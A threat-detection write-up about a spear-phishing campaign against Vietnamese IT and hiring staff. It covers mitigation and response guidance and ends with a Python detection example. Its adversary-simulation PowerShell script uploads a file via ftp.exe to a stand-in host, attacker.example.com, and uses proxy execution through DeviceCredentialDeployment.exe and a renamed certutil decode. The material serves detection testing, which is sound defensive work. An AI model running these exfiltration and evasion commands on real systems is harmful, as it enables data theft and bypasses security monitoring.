SOC Prime Bias: Critical

02 Dec 2025 18:54

Operation Hanoi Thief: Threat Actor Hits Vietnamese IT and Hiring Teams

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A spear-phishing operation dubbed “Operation Hanoi Thief” delivers a malicious ZIP archive that bundles a shortcut (LNK) and a pseudo-polyglot document. The shortcut abuses ftp.exe to execute a batch script that drops a DLL named MsCtfMonitor.dll into ProgramData and then performs DLL sideloading via ctfmon.exe. This DLL, dubbed LOTUSHARVEST, steals browser credentials and history and then exfiltrates the collected data over HTTPS.

Operation Hanoi Thief Campaign Analysis

SEQRITE Labs APT-Team researchers unpacked the ZIP archive, documented the LNK command line abusing ftp.exe, observed the creation of a renamed certutil.exe binary, and explored the DLL sideloading chain. They further captured network indicators involved in data exfiltration and attributed the campaign to a likely Chinese nation-backed threat actor.

Mitigation

Defensive guidance includes blocking execution of suspicious LNK shortcuts, limiting the use of native Windows tools like ftp.exe and certutil.exe in untrusted scripts, enforcing controls around DLL loading paths, and monitoring outbound HTTPS traffic to unfamiliar domains. Organizations should also apply strict email attachment filtering and reinforce user training around resume-themed phishing lures.

Response

Trigger alerts on the appearance of MsCtfMonitor.dll in ProgramData, ftp.exe executions with the -s flag, and outbound requests to known malicious domains. Quarantine any impacted files, isolate the compromised endpoint, and perform password and credential rotation for affected browsers.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An attacker who has gained a low-privilege shell on a compromised Windows machine wishes to exfiltrate data and maintain stealth.

    1. Stage 1 – FTP script execution: The attacker creates a temporary script upload.txt containing FTP commands and runs ftp.exe -s upload.txt to transfer files to an external server.
    2. Stage 2 – Proxy command execution: To hide the use of cmd.exe, the attacker launches DeviceCredentialDeployment.exe with the argument cmd.exe /c whoami; the signed utility spawns a hidden command shell, evading simple process-name alerts.
    3. Stage 3 – Masqueraded certutil usage: The attacker copies certutil.exe to C:\Temp\lala.exe and runs lala.exe -decode malicious.b64 output.exe to decode payloads, leveraging the rename to bypass filename-based detections.
  • Regression Test Script: The following PowerShell script reproduces the three steps in a repeatable way.

    # Regression Test Script – triggers the detection rule
    # 1. FTP with -s flag
    $ftpScript = "$env:TEMP\upload.txt"
    @"
    open attacker.example.com
    user testuser testpass
    put C:\Windows\System32\notepad.exe notepad.exe
    quit
    "@ | Set-Content -Path $ftpScript -Encoding ASCII
    Start-Process -FilePath "C:\Windows\System32\ftp.exe" -ArgumentList "-s `"$ftpScript`"" -NoNewWindow -Wait
    
    # 2. DeviceCredentialDeployment.exe proxying cmd.exe
    $dccPath = "C:\Program Files\DeviceCredentialDeployment\DeviceCredentialDeployment.exe"
    if (Test-Path $dccPath) {
        Start-Process -FilePath $dccPath -ArgumentList "cmd.exe /c whoami" -WindowStyle Hidden -Wait
    } else {
        Write-Host "DeviceCredentialDeployment.exe not found – skipping step 2."
    }
    
    # 3. Masqueraded certutil execution
    $original = "$env:SystemRoot\System32\certutil.exe"
    $masq = "$env:TEMP\lala.exe"
    Copy-Item -Path $original -Destination $masq -Force
    $payload = "$env:TEMP\malicious.b64"
    $output  = "$env:TEMP\decoded.exe"
    # Create a dummy base64 payload
    [IO.File]::WriteAllText($payload, [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("echo malicious")))
    Start-Process -FilePath $masq -ArgumentList "-decode `"$payload`" `"$output`"" -NoNewWindow -Wait
  • Cleanup Commands: Remove artefacts created during the test.

    # Cleanup Script
    Remove-Item -Path "$env:TEMP\upload.txt" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMP\malicious.b64" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMP\decoded.exe" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMP\lala.exe" -ErrorAction SilentlyContinue
    Write-Host "Cleanup completed."
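Detection logic for the triggers named under Response (MsCtfMonitor.dll dropped into ProgramData, ftp.exe with -s, the ctfmon.exe sideload) and for the three simulation stages above, as an added example that is not SOC Prime's rule or SEQRITE's analysis. It runs over constructed Sysmon-style events; the event IDs, field names (Image, OriginalFileName, ParentImage, TargetFilename, ImageLoaded) and sample values are assumptions, and the renamed-certutil check relies on OriginalFileName from the PE version resource surviving the rename.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style events (EID 1 process create, 7 image load, 11 file
# create); field names and values are assumptions, not captured telemetry.
EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\ftp.exe", "OriginalFileName": "ftp.exe",
     "CommandLine": r'ftp.exe -s "C:\Users\bob\AppData\Local\Temp\upload.txt"'},
    {"id": 1, "Image": r"C:\Temp\lala.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "lala.exe -decode malicious.b64 output.exe"},
    {"id": 1, "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd.exe /c whoami",
     "ParentImage": r"C:\Program Files\DeviceCredentialDeployment\DeviceCredentialDeployment.exe"},
    {"id": 11, "Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"C:\ProgramData\MsCtfMonitor.dll"},
    {"id": 7, "Image": r"C:\Windows\System32\ctfmon.exe",
     "ImageLoaded": r"C:\ProgramData\MsCtfMonitor.dll"},
    {"id": 1, "Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -verify cert.cer"},  # legitimate use: must not alert
]

def _name(path):
    return PureWindowsPath(path).name.lower()
def _in_programdata(path):
    parts = PureWindowsPath(path).parts  # e.g. ('C:\\', 'ProgramData', 'x.dll')
    return len(parts) > 1 and parts[1].lower() == "programdata"
def classify(ev):
    """Return the rule names an event matches; an empty list means no alert."""
    hits = []
    if ev["id"] == 1:
        image, cmd = _name(ev["Image"]), ev.get("CommandLine", "")
        orig, parent = ev.get("OriginalFileName", "").lower(), _name(ev.get("ParentImage", ""))
        # ftp.exe driven by a script file (-s:file or -s file): the LNK stage.
        if image == "ftp.exe" and re.search(r"(^|\s)-s(:|\s|$)", cmd):
            hits.append("ftp_script_execution")
        # PE version info still names certutil even though the file was renamed.
        if orig == "certutil.exe" and image != "certutil.exe":
            hits.append("renamed_certutil")
        if parent == "devicecredentialdeployment.exe" and image == "cmd.exe":
            hits.append("dcd_proxy_execution")
    elif ev["id"] == 11 and _name(ev["TargetFilename"]) == "msctfmonitor.dll" \
            and _in_programdata(ev["TargetFilename"]):
        hits.append("msctfmonitor_dropped")
    elif ev["id"] == 7 and _name(ev["Image"]) == "ctfmon.exe" \
            and _in_programdata(ev["ImageLoaded"]):
        hits.append("ctfmon_sideload")
    return hits
def scan(events):
    # Map the index of each alerting event to its matched rule names.
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}
```

Each of the five staged events fires exactly one rule while the legitimate certutil invocation stays silent; in production the same checks map onto process-creation, file-creation and image-load telemetry from Sysmon or an EDR.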